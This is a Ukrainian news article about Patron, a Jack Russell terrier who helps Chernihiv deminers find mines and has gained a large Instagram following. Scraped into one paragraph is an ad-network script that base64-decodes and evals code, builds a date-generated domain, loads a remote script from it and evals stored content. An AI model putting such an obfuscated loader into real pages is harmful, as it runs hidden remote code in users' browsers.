Відшуковує міни та підкорює Інстаграм: як пес Патрон став піротехніком (ВІДЕО)

Він мав стати зіркою виставок, але почав відшукувати міни та підкорювати Інстаграм. Його портрети – на мітингах за кордоном та муралі у Рівному, з ним фотографуються. А діти з усього світу зображують його на малюнках. Це все про чернігівського пса, маленького помічника піротехніків – Патрона.

Відшуковує міни та підкорює Інстаграм: як чернігівський пес Патрон став піротехніком

Патрон має свою тактичну розгрузку і шеврони. Цуценя породи джек-рассел-тер’єр став колегою своєму господарю Михайлу. Вони вдвох піротехніки. З початку війни жили на роботі.

Михайло Ільєв працює начальником групи піротехнічних робіт та підводного розмінування в Управлінні ДСНС в Чернігівській області. Чоловік говорить,Патрон був подарунком для сина Михайла, він його і назвав.

Відшуковує міни та підкорює Інстаграм: як чернігівський пес Патрон став піротехніком
Михайло Ільєв з Патроном

Пес має титулованих батьків, тому йому також пророкували перемоги у собачих виставках. Але змалечку Михайло почав брати Патрона на роботу.

Півтора року роботи із кінологом та постійна практика дала результати. З початку війни піротехніки виявили та знищили понад 19 тисяч боєприпасів в Чернігівській області. Частину з них знайшов саме Патрон.

Відшуковує міни та підкорює Інстаграм: як чернігівський пес Патрон став піротехніком

Михайло Ільєв говорить, Патрон допомагає шукати протитанкові міни:

«Якщо щось знаходить – починає копати, це означає, щось тут є. Після того отримує заохочення і далі працює сапер. Він навчається на різні запахи, на вдосконалення ми працюємо з ним кожен день. Через те, що знищували вибухонебезпечні предмети, ми його привчали до підривів, перші 2-3 рази я його тримав, і після того я зрозумів, він навіть не реагує на них».

Відшуковує міни та підкорює Інстаграм: як чернігівський пес Патрон став піротехніком

Наприкінці березня піротехніки створити Патрону сторінку в Інстаграмі. Нині він має196 тисяч підписників і щодня ця цифра збільшується. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Відшуковує міни та підкорює Інстаграм: як чернігівський пес Патрон став піротехніком
Інстаграм-сторінка Патрона

Діти з усього світу малюють портрети Патрона та питають, коли чекати на маленьких патрончиків.

Відшуковує міни та підкорює Інстаграм: як чернігівський пес Патрон став піротехніком
Діти малюють Патрона

Такого успіху ніхто не очікував, кажуть піротехніки. Вони самі ведуть сторінку Патрона. Коли на це залишається час.

«У нас майже ніколи немає часу, ми з ранку до вечора на виїздах, працюємо в полях лісах, коли є час, тоді займаємося, виставляємо нові пости, фотографії, відео», – говорить Михайло Ільєв.

Працівники чернігівської служби надзвичайних ситуацій радіють, що таким чином Патрон привертає увагу до проблеми розмінування Чернігівської області.

“Після закінчення бойових дій, років на п’ять, будуть заплановані лише розмінування по території області. Великий обсяг робіт, зараз ми зачищаємо тільки населені пункти, не забуваємо, що є купа лісових масивів, посадок, мостів і все інше. В планах у мене одне – максимум розмінувати територію Чернігівської області, щоб люди жили спокійно і мирно”, – говорить Михайло Ільєв.

Тим часом у Рівному з’явився патріотичний мурал, що уособлює ідею українського героїзму. Серед людей художник Костянтин Качановський намалював й Патрона.

Фото та відео: Суспільне Чернігів (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/vidshukovuye-mini-ta-pidkoryuye-instagram-yak-pes-patron-stav-pirotehnikom-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top